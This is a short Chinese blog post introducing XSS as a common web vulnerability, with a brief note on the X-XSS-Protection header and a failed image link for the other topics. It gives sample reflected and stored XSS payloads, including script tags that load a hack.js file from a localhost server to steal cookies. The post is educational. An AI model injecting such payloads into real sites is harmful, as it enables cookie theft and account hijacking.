web常见的安全漏洞与防范

web常见的安全漏洞基本分为XSS、CSRP、点击劫持、SQL注入这4种情况

xss

xss(Cross-site-Script, 跨站脚本攻击),因为缩写和css重叠,所以只好叫为xss。

什么是?

通过存在安全漏洞的web网站注册用户的浏览器内运行非法的非法站点Html或js进行的一种攻击

影响

  • 利用虚假输入表单骗取用户的信息
  • 利用脚本窃取用户的cookie值,被害者在不知情的情况下,帮助攻击者发送恶意的请求
  • 显示伪造的文章或者图片

分类

  • 反射型-URL参数直接注入

eg:
1)http://location:3000/?from=<script>alert(3)</script>;
2) 获取Cookie:http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"> </script>
3) 短域名伪造:https://dwz.cn/

  • 存储型-存储到DB后读取注入

eg:
1)评论等输入框输入:
2) 跨站脚本注入:我来了<script src="http://localhost:4000/hack.js"></script>

危害

1)获取页面数据;
2)获取cookies;
3) 劫持前端逻辑;
4)发送请求;
5)偷取网站的任意数据;
6)偷取用户资料;
7)偷取用户的秘密和登录态;
8)欺骗用户;

防范

HEAD

ctx.set(‘x-xss-protection’,0);
0:禁用xss过滤;
1:启用xss过滤;如果检测到攻击,浏览器将清除页面(删除不安全的部分)(通常浏览器是默认的) 大多数浏览器框架都进行的安全普通的安全过滤,如,xss; 启用过滤:
1:mode=block 检测到攻击,浏览器不会清除页面,而是阻止页面加载;
2:report=(Chromium only)
检测到跨站脚本攻击,浏览器清除页面并使用CSP report-uri指令的功能发送违规报告;

其他内容,直接上思维导图

因为这块内容写下来比较多,所以直接上图,更加一目了然,对于web常见的安全漏洞与防范,我整理了一个思维导图,如下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xAQiCmDn-1656592295055)(https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8bb1e31ab10e410e9bc89bb85f60a605~tplv-k3u1fbpfcp-zoom-in-crop-mark:1956:0:0:0.image?)] 最后:不要问我为什么一开始不直接上思维导图,我也想,只因为字数不够😝

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值